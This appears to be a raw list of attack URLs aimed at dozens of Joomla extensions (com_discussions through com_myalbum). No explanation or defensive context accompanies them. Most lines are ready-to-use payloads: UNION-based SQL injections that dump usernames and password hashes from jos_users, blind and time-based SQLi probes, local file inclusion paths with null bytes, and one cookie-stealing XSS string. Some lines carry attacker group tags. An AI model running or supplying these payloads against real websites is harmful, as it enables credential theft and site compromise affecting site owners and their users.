index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=1' union all select (select concat(0x7e,0x27,unhex(Hex(cast(jos_users.password as char))),0x27,0x7e) from `[Database Name]`.jos_users Order by username limit 0,1) --+a
index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=1' union all select (select concat(0x7e,0x27,unhex(Hex(cast(jos_users.username as char))),0x27,0x7e) from `[Database Name]`.jos_users Order by username limit 0,1) --+a
index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=[SQLi]
index.php?option=com_djartgallery&task=editItem
index.php?option=com_djcatalog&view=show&cid=10+and+substring(@@version,1,1)=5
index.php?option=com_djcatalog&view=show&cid=1+and+substring(@@version,1,1)=5
index.php?option=com_djcatalog&view=show&cid=5+and+1=0+union+select+1,password,3,4+from+jos_users
index.php?option=com_djcatalog&view=show&cid=x[BSQL]
index.php?option=com_djcatalog&view=showItem&id=1+and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1
index.php?option=com_djcatalog&view=showItem&id=1+and+substring(@@version,1,1)=5
index.php?option=com_djcatalog&view=showItem&id=[BSQL]
index.php?option=com_djcatalog&view=showItem&id=null+and+1=0+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+jos_users
index.php?option=com_djcatalog&view=showItem&id=[Sqlinjection]
index.php?option=com_djcatalog&view=show&layout=blog&cid=10+and+substring(@@version,1,1)=5
index.php?option=com_djcatalog&view=show&layout=blog&cid=1+and+substring(@@version,1,1)=5
index.php?option=com_djcatalog&view=show&layout=blog&cid=x[BSQL]
index.php?option=com_djclassifieds&view=showitem&cid=6&id=29&Itemid=1
index.php?option=com_dms&task=view_category&category_id=-666+union+all+select+666,666,666,666,666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666+from+jos_users--
index.php?option=com_dms&task=view_category&category_id=[INDONESIANCODER]
index.php?option=com_dms&view=category&layout=table&Itemid=13
index.php?option=com_docman&task=cat_view&gid=112&Itemid=27
index.php?option=com_docman&task=cat_view&gid=16&Itemid=47
index.php?option=com_docman&task=doc_download&gid=35&Itemid=28
index.php?option=com_drawroot&controller=..
index.php?option=com_drawroot&controller=[LFI]
index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12 (SQL)
index.php?option=com_dtregister&eventId=-12 UNION SELECT concat(username,0x3a,password) FROM jos_users&task=pay_options&Itemid=138
index.php?option=com_dtregister&eventId={SQL}
index.php?option=com_dwgraphs&controller={lfi}%00
index.php?option=com_econtent&controller=..
index.php?option=com_education_classess&task=showEvents&id=11[c0de]
index.php?option=com_education_classes&task=showEvents&id=11
index.php?option=com_eportfolio&Itemid=18&task=personal&user=71
index.php?option=com_eportfolio&Itemid=1&task=viewlinks&user=71
index.php?option=com_equipment&task=components&id=45&sec_men_id=[SQL] 
index.php?option=com_equipment&view=details&id=[SQL] 
index.php?option=com_equotes&id=13 and 1=1 union select user(),concat(username,0x3a,password),user(),user(),user(),user(),user() FROM jos_users--
index.php?option=com_equotes&id={SQL}
index.php?option=com_estateagent&Itemid=47&act=object&task=showEO&id=[sqli]
index.php?option=com_eventcal&Itemid=[BLIND SQL-i] 
index.php?option=com_eventing&catid=1"
index.php?option=com_eventlist&func=details&did=[SQL Inject]
index.php?option=com_event&task=details&sid=61 [sql]
index.php?option=com_event&task=details&sid=-61 union select
index.php?option=com_event&task=view&id=-14%20UnioN
index.php?option=com_event&view=..
index.php?option=com_event&view=[LFI]
index.php?option=com_expshop&page=show_payment&catid=-2 UNION SELECT @@version,@@version,concat(username,0x3a,password) FROM jos_users--
index.php?option=com_expshop&page=show_payment&catid={SQL}
index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1+and+0+union+select+1,2,concat(username,0x3a,password),4,5,6,7+from+%23__users+where+gid=25+or+gid=24+and+block%3C%3E1--
index.php?option=com_fabrik&controller=..
index.php?option=com_fabrik&controller=[LFI]
index.php?option=com_fabrik&view=table&tableid=13+union+select+1--
index.php?option=com_fabrik&view=table&tableid=[SQL]
index.php?option=com_facebook&view=student&id=-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12+from+jos_users--
index.php?option=com_facebook&view=student&id=[INDONESIANCODER]
index.php?option=com_family&view=family&task=getproductsbyfamily&familyid=2&categoryid=-1 UNION SELECT 1,2,3,4 FROM jos_users
index.php?option=com_family&view=family&task=getproductsbyfamily&familyid=2&categoryid=-498 UNION SELECT 1,2,3,4 FROM jos_users
index.php?option=com_family&view=family&task=getproductsbyfamily&familyid=2&categoryid=[SQL]
index.php?option=com_fastball&league=-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11+from+jos_users--
index.php?option=com_fastball&league=[INDONESIANCODER]
index.php?option=com_filiale
index.php?option=com_fireboard&Itemid=0&id=1&catid=0&func=fb_pdf'[SQL-INJECTION]
index.php?option=com_flashgames&controller=..
index.php?option=com_flashgames&controller=[LFI]
index.php?option=com_flashmagazinedeluxe&Itemid=10&task=magazine&mag_id=-4+SQL
index.php?option=com_flash&sid=-1+UNION+SELECT+1,2,3,4,5,6--
index.php?option=com_flash&sid=[SQL]
index.php?option=com_flexicontent&controller= [lfi]%00
index.php?option=com_flippingbook
index.php?option=com_flipwall&controller=flipwall&catid=[EXPLOIT]
index.php?option=com_foobla_suggestions&controller=comment&idea_id=null+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12+from+jos_users
index.php?option=com_foobla_suggestions&controller=comment&idea_id=[Sqlinjection]
index.php?option=com_foobla_suggestions&controller=[LFI]%00
index.php?option=com_football&task=viewteams&leagueID=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12--
index.php?option=com_football&task=viewteams&leagueID=[SQL]
index.php?option=com_fss&view=faq&Itemid=4&catid=1&tmpl=component&faqid={sql}
index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R
index.php?option=com_g2bridge&controller=..
index.php?option=com_g2bridge&controller=[LFI]
index.php?option=com_gadgetfactory&controller=..
index.php?option=com_gadgetfactory&controller=[LFI]
index.php?option=com_gameq&task=page&category_id=-1 UNION SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14 FROM jos_users--
index.php?option=com_gameq&task=page&category_id={SQL}
index.php?option=com_gamesbox&view=consoles&layout=console&id=[SQLi]
index.php?option=com_gameserver&view=gamepanel&id=999999
index.php?option=com_gbufacebook&task=show_face&face_id=[INDONESIANCODER]
index.php?option=com_gcalendar&controller=..
index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,concat(username,0x3a,password),2,3,4+from+jos_users--
index.php?option=com_giftexchange&view=showcase&aj=package&pkg=-1union%20select%201,2,3,4,5,concat_ws(0x3a,username,password)chipD3Bi0s,1,1,1,1,1,1,1,1,1+from+jos_users+where+usertype=0x53757065722041646D696E6973747261746F72+and+0x41646D696E6973747261746F72--
index.php?option=com_gigcal&Itemid=78&id=-999+union+all+select+1,2,3,4,5,6,7,8,9,concat(username,char(58),password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users
index.php?option=com_gigcal&task=details&gigcal_gigs_id=402'+and+1=2
index.php?option=com_gigcal&task=details&gigcal_gigs_id=[Exploit]
index.php?option=com_gigfe&task=style&styletype=-1
index.php?option=com_gigfe&task=style&styletype=[SQL]
index.php?option=com_google&controller=..
index.php?option=com_google&controller=[LFI]
index.php?option=com_graphics&controller=..
index.php?option=com_graphics&controller=[LFI]
index.php?option=com_gsticketsystem&controller=entrypoint&task=viewCategory&catid=2"
index.php?option=com_guide&season=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12--
index.php?option=com_guide&season=[SQL]
index.php?option=com_gurujibook&task=showPDF&bookid=-32+union+all+select+concat(username,0x3a,password),2,3,4+from+jos_users--
index.php?option=com_hbssearch&task=showhoteldetails&id=118&adult=2<script>alert(document.cookie);<
index.php?option=com_hbssearch&task=showhoteldetails&id=1&r_type=[SQL-vulnerability]
index.php?option=com_hbssearch&task=showhoteldetails&id=4&r_type=1 and substring(@@version,1,1)=4&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&star=&child1=0&adult1=1&Itemid=54    -->FALSE
index.php?option=com_hbssearch&task=showhoteldetails&id=4&r_type=1 and substring(@@version,1,1)=5&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&star=&child1=0&adult1=1&Itemid=54    -->TRUE
index.php?option=com_hdvideoshare&view=player&id=-45+UNION SELECT concat(username,0x3a,password,0x3a,email),2,3,4+from+jos_users
index.php?option=com_hestar&task=showlist&id=-3 union select concat_ws(0x3a,username,password)+from+mos_users--
index.php?option=com_hezacontent&view=item&id=-1+union+all+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,17,18+from+jos_users--
index.php?option=com_hezacontent&view=item&id=[INDONESIANCODER]
index.php?option=com_hmcommunity&view=fnd_home&id=155 and @@version=5
index.php?option=com_hmcommunity&view=fnd_home&id=[NB] union select all 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
index.php?option=com_hmcommunity&view=fnd_profile&uid=155
index.php?option=com_horoscope&controller=..
index.php?option=com_horoscope&controller=[LFI]
index.php?option=com_hotbrackets&id=1 and 1=0
index.php?option=com_hotbrackets&id=1 and 1=1
index.php?option=com_hsconfig&controller=..
index.php?option=com_hsconfig&controller=[LFI]
index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1
index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1[c0de]
index.php?option=com_huruhelpdesk&view=detail&cid[0]=[SQL]
index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1
index.php?option=com_ice&catid=1 and ascii(substring((SELECT concat(username,0x3a,password) from jos_users limit 0,1),1,1))>96
index.php?option=com_ice&catid=1 and substring(@@version,1,1)=4   >>(False)
index.php?option=com_ice&catid=1 and substring(@@version,1,1)=5   >>(True)
index.php?option=com_ice&catid=1[SQL code]
index.php?option=com_ice&Itemid=123&catid=1"
index.php?option=com_icrmbasicdemo&v672=Contacts&v669=v694&v675=oab&v660=main&v656=-10+union+select+1,concat_ws(0x3a,username,password),3,password,username,6,7,8,9,10,11,12,13,14,15,16,17,18,19,version()tukulesto,21,22,23,24+from+jos_users--&v658=en-GB&Itemid=483
index.php?option=com_icrmbasic&p1=m6&p3=-10+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+jos_users--&p20=oab&p4=Contacts&p5=en-GB&Itemid=483
index.php?option=com_icrmbasic&p1=m6&p3=[INDONESIANCODER]&p20=oab&p4=Contacts&p5=en-GB&Itemid=483
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,2,concat%28username,0x3a,password,0x3a,email%29,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
index.php?option=com_if_surfalert&controller=..
index.php?option=com_if_surfalert&controller=[LFI]
index.php?option=com_imagebrowser&folder=..
index.php?option=com_img&controller=..
index.php?option=com_include&lang=en_GB&Itemid=50&ID_NLE=-1 UNION SELECT concat(username,0x3a,password) FROM jos_users
index.php?option=com_include&lang=en_GB&Itemid=50&ID_NLE=[SQL]
index.php?option=com_installer",hdrs)
index.php?option=com_iproperty&view=agentproperties&id=-999999
index.php?option=com_iproperty&view=agentproperties&id=[elich4]
index.php?option=com_iproperty&view=agentproperties&id=[SQL]
index.php?option=com_itarmory&view=guildmembers&Itemid=?filter_search=&filter_level=1&filter_race=*&filter_class=8+and+1=2+union+all+select+1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+from+jos_users--+
index.php?option=com_itarmory&view=guildmembers&Itemid=[SQL]
index.php?option=com_items&parent=-1+UNION+SELECT+version(),2--
index.php?option=com_items&parent=[SQL]
index.php?option=com_jabode&task=sign&sign=taurus&id=-2 UNION SELECT user(),user(),user(),user(),concat(username,0x3a,password) FROM jos_users--
index.php?option=com_jabode&task=sign&sign=taurus&id={SQL}
index.php?option=com_jacomment&view=..
index.php?option=com_jacomment&view=[LFI]
index.php?option=com_jajobboard&controller=..
index.php?option=com_jajobboard&controller=[LFI]
index.php?option=com_jajobboard&view=..
index.php?option=com_jajobboard&view=[LFI]
index.php?option=com_jashowcase&view=jashowcase&controller=..
index.php?option=com_javoice&view=[INDONESIANCODER]
index.php?option=com_jb2&PostID=[exploit]
index.php?option=com_jbook&Itemid=90 and 1=0
index.php?option=com_jbook&Itemid=90 and 1=1
index.php?option=com_jbpublishdownfp&task=edit&cid[]=-1+union+all+select+concat(username,0x3A3A3A,password)+from+jos_users
index.php?option=com_jbpublishdownfp&task=edit&cid[]=[SQL]
index.php?option=com_jce&Itemid=-8   <= False
index.php?option=com_jce&Itemid=8    <= True
index.php?option=com_jcollection&controller=..
index.php?option=com_jcommunity&controller=members&task=[sqli]
index.php?option=com_jdownloads&Itemid=133&task=view.download&catid=22&cid=234]
index.php?option=com_jdrugstopics&view=drugsdetails&id=
index.php?option=com_jdrugstopics&view=drugsdetails&id=[SQL]
index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13
index.php?option=com_jeauto&catid=1&item=1&Itemid=3&view=item&char=' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14%23
index.php?option=com_jeauto&view=[LFI]%00
index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2[bsql]
index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2[bsql]
index.php?option=com_jeformcr&view={LFI}%00
index.php?option=com_jeguestbook&view=..
index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999,NULL),NULL)))
index.php?option=com_jejob&view=item&catid=[SQLi]
index.php?option=com_jejob&view=[LFI]
index.php?option=com_jembed&task=summary&catid=99"
index.php?option=com_jemessenger&view=compose
index.php?option=com_jepoll&view=poll_graph&task=pollgraph&pollid=[SQLi]
index.php?option=com_jequizmanagement&view=question&eid=1+AND+1=if(substring(@@version,1,1)=4,1,0)&Itemid=163
index.php?option=com_jequizmanagement&view=question&eid=1+AND+1=if(substring(@@version,1,1)=5,1,0)&Itemid=163
index.php?option=com_jequizmanagement&view=question&eid=[SQL]&Itemid=163
index.php?option=com_jequoteform&view=..
index.php?option=com_jequoteform&view=[LFI]
index.php?option=com_jesubmit&view=[LFI]%00
index.php?option=com_jfeedback&controller=..
index.php?option=com_jfeedback&controller=[LFI]
index.php?option=com_jfuploader&Itemid=[Itemid]
index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(password,0x3a,username)+from+jos_users+limit+0,1),1,1))=97
index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(password,0x3a,username)+from+jos_users+limit+0,1),1,1))=98
index.php?option=com_jfusion&Itemid=66+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1
index.php?option=com_jfusion&Itemid=n[Sql Code]
index.php?option=com_jgen&task=view&id=[SQL Injection] 
index.php?option=com_jgrid&controller=..
index.php?option=com_jimtawl&Itemid=12&task=..
index.php?option=com_jimtawl&Itemid=12&task=[LFI]
index.php?option=com_jinventory&controller=..
index.php?option=com_jmarket&controller=product&task=[sqli]
index.php?option=com_jnewspaper&cid=31337
index.php?option=com_joaktree&view=joaktree&treeId=[INDONESIANCODER]
index.php?option=com_job&controller=listcategory&task=viewJob&id_job=-1+UNION+ALL+SELECT+1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+FROM+jos_users--
index.php?option=com_job&controller=listcategory&task=viewJob&id_job=[SQL]
index.php?option=com_jobline&task=results&Itemid=&search=
index.php?option=com_jobline&task=results&Itemid=&search=%' and substring(@@version,1,1)=5 and '%'='
index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users--
index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=[SQL]
index.php?option=com_job&task=showMoreUser&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(username,0x3a,password),17,18,19,20,21,22,23,24,25+from+kew_users--
index.php?option=com_job&task=showMoreUser&id=[SQL] 
index.php?option=com_jombib&amp;&amp;order=ryear&amp;limit=' + this.options[selectedIndex].value + '&amp;limitstart=0';">
index.php?option=com_jomestate&task=[ur evil script site]
index.php?option=com_joomclip&view=thumbs&cat=20%20and%20substring%28@@version,1,1%29=4
index.php?option=com_joomclip&view=thumbs&cat=20%20union%20all%20select%201,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
index.php?option=com_joomdle&view=detail&cat_id=1&course_id=-999.9'+UNION+ALL+SELECT+1,2,3,4,5,group_concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18+from+mdl_user--+and+'kaMtiEz'='kaMtiEz
index.php?option=com_joomdle&view=detail&cat_id=1&course_id=[INDONESIANCODER]
index.php?option=com_joomgalaxy&view=addentry
index.php?option=com_joomgalaxy&view=categorylist&type=thumbnail&lang=en&catid=100000001-100000001=0 union (select 1,database(),3,4,5,6,7,8,9,10,11,12,13)
index.php?option=com_joomgallery&func=votepic&id="here id de voto"&Itemid=85");
index.php?option=com_joomlaconnect_be&Itemid=53&task=showBizPage&id=3
index.php?option=com_joomladate&task=viewProfile&user=9999999 UNION SELECT user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user() FROM jos_users--
index.php?option=com_joomladate&task=viewProfile&user={SQL}
index.php?option=com_joomlaflickr&controller=..
index.php?option=com_joomlaflickr&controller=[LFI]
index.php?option=com_joomlapicasa2&controller=..
index.php?option=com_joomlapicasa2&controller=[LFI]
index.php?option=com_joomlaupdater&controller=..
index.php?option=com_joomlaupdater&controller=[LFI]
index.php?option=com_joomloads&view=package&Itemid=2&packageId=-156+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users--
index.php?option=com_joomloads&view=package&Itemid=2&packageId=<SQL CODE>
index.php?option=com_joomloc&controller=loc&view=loc&layout=loc&task=edit&cid[]=1&id=1 and 1=2 union select 1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56+from+jos_users
index.php?option=com_joomloc&controller=loc&view=loc&layout=loc&task=edit&cid[]=1&id=1[SQL code]
index.php?option=com_joomlub&controller=auction&view=auction&task=edit&aid=2%20and%201=1 => True
index.php?option=com_joomlub&controller=auction&view=auction&task=edit&aid=2%20and%201=2 => False
index.php?option=com_joomlub&controller=auction&view=auction&task=edit&aid=-2%20union%20all%20select%201,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
index.php?option=com_joomlub&controller=auction&view=auction&task=edit&aid=2 and substring(@@version,1,1)=4 => False
index.php?option=com_joomlub&controller=auction&view=auction&task=edit&aid=2 and substring(@@version,1,1)=5 => True
index.php?option=com_joommail&controller=..
index.php?option=com_joommail&controller=[LFI]
index.php?option=com_joomnik&album=6'
index.php?option=com_joomportfolio&task=showsec&Itemid=44&secid=1+AND SUBSTRING(@@version,1,1)=4 (no)
index.php?option=com_joomportfolio&task=showsec&Itemid=44&secid=1+AND SUBSTRING(@@version,1,1)=5 (yes)
index.php?option=com_joomtouch&controller=..
index.php?option=com_joomtouch&controller=[LFI]
index.php?option=com_joomtracker&task=tordetails&id=1
index.php?option=com_jotloader&section=[LFI]%00
index.php?option=com_jphone&controller={LFI}
index.php?option=com_jphoto&view=category&id=[INDONESIANCODER]
index.php?option=com_jp_jobs&view=detail&id='
index.php?option=com_jp_jobs&view=detail&id=1
index.php?option=com_jp_jobs&view=detail&id=-999999
index.php?option=com_jp_jobs&view=detail&id=[SQLi]
index.php?option=com_jpodium&view=races&Itemid= [SQL Injection] 
index.php?option=com_jprojectmanager&controller=..
index.php?option=com_jprojectmanager&controller=[LFI]
index.php?option=com_jradio&controller=[LFI]%00
index.php?option=com_jreservation&task=propertycpanel&pid=1+and+1=1
index.php?option=com_jreservation&task=propertycpanel&pid=X[blind]
index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users
index.php?option=com_jshop&view=product&family=INDONESIANCODER&group=0&pid=[ExpL0!7]
index.php?option=com_jsjobs&c=jsjobs&view=employer&layout=view_company&vm=kaMz&md=[INDONESIANCODER]
index.php?option=com_jsjobs&c=jsjobs&view=employer&layout=view_job&vj=kaMtiEz&jobcat=Tukulesto&oi=[INDONESIANCODER]
index.php?option=com_jsjobs&task=edit&cid[]=-69
index.php?option=com_jstore&controller=product-display&task=[sqli]
index.php?option=com_jsubscription&controller=subscription&task=[sqli]
index.php?option=com_jtickets&controller=ticket&task=[sqli]
index.php?option=com_jtips&Itemid=1&task=ladder&season=2+and+1=1
index.php?option=com_jtips&Itemid=1&task=ladder&season=2+and+1=2
index.php?option=com_jtips&Itemid=1&task=ladder&season=2[SQL code]
index.php?option=com_jtips&Itemid=2&task=ladder&season=1+and+1=!
index.php?option=com_jtips&Itemid=2&task=ladder&season=1+and+1=1
index.php?option=com_jtm&view=search&author=-666
index.php?option=com_jtm&view=search&view=search&author=
index.php?option=com_jtm&view=search&view=search&author=[INDONESIANCODER]
index.php?option=com_jukebox&controller=..
index.php?option=com_jukebox&controller=[LFI]
index.php?option=com_juliaportfolio&controller=..
index.php?option=com_juliaportfolio&controller=[LFI]
index.php?option=com_jumi&fileid=2'+and+ascii(substring((SELECT+concat(username,0x3a,password)+from+jos_users+limit+0,1),1,1))=101
index.php?option=com_jumi&fileid=n<Sql Code>
index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users--
index.php?option=com_juser&task=show_profile&id=70[SQL code]
index.php?option=com_jvehicles&controller=..
index.php?option=com_jvehicles&task=agentlisting&aid=31337
index.php?option=com_jvideodirect&controller=..
index.php?option=com_jvideo&view=user&user_id=62+and%201=2+union+select+concat(username,0x3a,password)+from+jos_users
index.php?option=com_jvideo&view=user&user_id=62[SQL code]
index.php?option=com_jwhmcs&controller=..
index.php?option=com_jwhmcs&controller=[LFI]
index.php?option=com_k2&view=itemlist&category=null'+and+1=2+union+select+1,concat(username,0x3a,password)ChipD3Bi0s,3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users
index.php?option=com_k2&view=itemlist&category=<sql Code>
index.php?option=com_kbase&view=article&id=-1+union+select+1,concat(username,char(58),password)KHG,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users--
index.php?option=com_king&Itemid=0&task=show&id_k=13 and 1=0
index.php?option=com_king&Itemid=0&task=show&id_k=13 and 1=1
index.php?option=com_kk&kat=1 and 1=0
index.php?option=com_kk&kat=1 and 1=1
index.php?option=com_konsultasi&act=detail&sid=[gubrak]
index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en
index.php?option=com_ksadvertiser&pid=[EXPLOIT]&task=showcats
index.php?option=com_kunena&Itemid=171&func=view&catid=32&id=6310
index.php?option=com_kunena&Itemid=86&func=announcement&do=show', link='0wn3d', task='0wn3d' WHERE userid=62 AND 1=if(substring(@@version,1,1)=4,benchmark(999999,md5(@@version)),1)
index.php?option=com_kunena&Itemid=86&func=announcement&do=show', link='0wn3d', task='0wn3d' WHERE userid=62 AND 1=if(substring(@@version,1,1)=5,benchmark(999999,md5(@@version)),1)
index.php?option=com_kunena&Itemid=86&func=announcement&do=[SQL]
index.php?option=com_leader&Itemid=3160&task=view&id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11 FROM jos_users
index.php?option=com_leader&Itemid=3160&task=view&id=-498 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11 FROM jos_users
index.php?option=com_leader&Itemid=3160&task=view&id=[SQL]
index.php?option=com_libros&task=detail&Itemid=27&id=[EXPLOIT]
index.php?option=com_liveticker&task=viewticker&tid=1"
index.php?option=com_liveticker&task=viewticker&tid=1 and substring(@@version,1,1)=4   >>(False)
index.php?option=com_liveticker&task=viewticker&tid=1 and substring(@@version,1,1)=5   >>(True)
index.php?option=com_liveticker&task=viewticker&tid=[SQL]
index.php?option=com_loginbox&view=..
index.php?option=com_loginbox&view=[LFI]
index.php?option=com_lovefactory&controller=..
index.php?option=com_lovefactory&controller=[LFI]
index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=4
index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5
index.php?option=com_lyftenbloggie&author=62+union+select+1,concat_ws(0x3a,username,password),3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+jos_users--
index.php?option=com_lyftenbloggie&author=[ValidID][INDONESIANCODER]
index.php?option=com_maianmedia&view=music&cat=-9999+union+all+select+1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users--
index.php?option=com_maianmedia&view=music&cat=[SQLi]
index.php?option=com_maianmusic&section=category&category=-1+union+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users--&Itemid=70&lang=en
index.php?option=com_mailto&tmpl=component&template=beez_20&link=aHR0cDovL2xvY2FsaG9zdC9qL2luZGV4LnBocD94PXkgSGFpIEkgYW0gYSBzcGFtIG1lc3NhZ2UhIFdvdWxkIHlvdSBsaWtlIHRvIGJ1eSBhbGwgc29ydHMgb2YgZmFrZSBzdHVmZj8gU1BBTSBTUEFNIFNQQU0=
index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)KHG+from+jos_users--&Itemid=1
index.php?option=com_mambads&Itemid=39&func=view&cacat=33&casb=1+UNION all SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(username,0x3a,password,0x3a,email),17,18,19,20,21,22,23+from+mos_users--
index.php?option=com_manager&view=flight&Itemid=[SQL]
index.php?option=com_market&controller=..
index.php?option=com_market&controller=[LFI]
index.php?option=com_marketplace&page=show_category&catid=9999+union+select+concat(username,0x3a,password),2,3+from+jos_users--
index.php?option=com_marketplace&page=show_category&catid=[TR-ShaRk]
index.php?option=com_markt&page=show_category&catid=7+union+select+0,1,password,3,4,5,username,7,8+from+jos_users--
index.php?option=com_matamko&controller=..
index.php?option=com_matamko&controller=[LFI]
index.php?option=com_mdigg&act=story_lists&task=view&category=-9999
index.php?option=com_mdigg&act=story_lists&task=view&category=[exploit]
index.php?option=com_mediamall&category=1+AND+SUBSTRING(@@version,1,1)=4 << false
index.php?option=com_mediamall&category=1+AND+SUBSTRING(@@version,1,1)=5 << true
index.php?option=com_mediamall&category=1[BSQL]
index.php?option=com_mediqna&controller=..
index.php?option=com_mediqna&controller=[INDONESIANCODER]
index.php?option=com_memory&controller=..
index.php?option=com_memory&controller=[LFI]
index.php?option=com_menu&id=-1+UNION+SELECT+1,2,3,4,5,6--
index.php?option=com_menu&id=[SQL]
index.php?option=com_misterestate&act=mesearch&task=showMESR&tmpl=component";
index.php?option=com_mmsblog&controller=..
index.php?option=com_mmsblog&controller=[LFI]
index.php?option=com_mosres&catID=1004&regID=2&task=viewproperty&property_uid=null'+and+1=2+union+select+1,2,3,4,concat(username,0x3a,password)ChipD3Bi0s,6,7,8,9,10,11,12,13+from+jos_users
index.php?option=com_mosres&task=showregion&regID=4%27+and+1=2+union%20select%201,concat(username,0x3a,password)+from+jos_users
index.php?option=com_mosres&task=viewproperty&property_uid=1005%27%20and%201=2%20union%20select%201,2,3,4,concat(username,0x3a,password)ChipD3bi0s,6,7,8,9,10,11,12,13+from+mos_users
index.php?option=com_mosres&task=viewproperty&property_uid=[SQL code]
index.php?option=com_movm&controller=product&task=product&id=999999'+UNION+ALL+SELECT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2Cdatabase()+FROM+information_schema.schemata--+D4NB4R%20
index.php?option=com_mscomment&controller=[INDONESIANCODER]
index.php?option=com_mtfireeagle&controller=..
index.php?option=com_mtfireeagle&controller=[LFI]
index.php?option=com_multimap&controller=..
index.php?option=com_multimap&controller=[LFI]
index.php?option=com_multiroot&controller=..
index.php?option=com_multiroot&controller=[LFI]
index.php?option=com_musicgallery&task=itempage&id=[INDONESIANCODER]
index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=1&mid=5%5Bc0de>}
index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=1&mid=5+and+1=2+union+select+1,2,group_concat%28username,0x3a,password%29,4,5,6,7,8,9,10,11,12+from+jos_users>
index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=XX&mid=XX&Itemid=XX
index.php?option=com_myalbum&album=-1+union+select+0,concat(username,char(32),password),2,3,4%20from%20jos_users
